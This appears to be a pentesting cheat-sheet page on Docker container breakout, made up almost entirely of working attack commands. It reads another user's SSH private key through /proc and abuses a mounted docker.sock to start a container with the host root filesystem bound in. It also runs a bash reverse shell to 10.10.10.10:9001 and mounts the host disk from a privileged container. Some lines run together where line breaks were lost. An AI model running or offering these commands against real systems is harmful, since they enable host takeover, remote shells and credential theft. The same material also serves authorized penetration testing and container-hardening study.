Docker Breakout
Enumeration Scripts
Process Abuse
ps -ef --forestls -la /proc/<PID>/root/home/qu35t/.ssh/id_rsaMounted docker socket
find / -name docker.sock 2>/dev/nullcurl -s --unix-socket /var/run/docker.sock http://localhost/images/json#!/bin/bash
cmd="[\"/bin/sh\",\"-c\",\"chroot /tmp sh -c \\\"bash -c 'bash -i &>/dev/tcp/10.10.10.10/9001 0<&1'\\\"\"]"
curl -s -X POST --unix-socket /var/run/docker.sock -d "{\"Image\":\"alpine\",\"cmd\":$cmd,\"Binds\":[\"/:/tmp:rw\"]}" -H 'Content-Type: application/json' http://localhost/containers/create?name=qu35t
curl -s -X POST --unix-socket /var/run/docker.sock "http://localhost/containers/qu35t/start"Container Capabilities
capsh --printfdisk -l
mkdir /mnt/qu35t
mount /dev/sda1 /mnt/qu35t
ls -la /mnt/qu35t/Last updated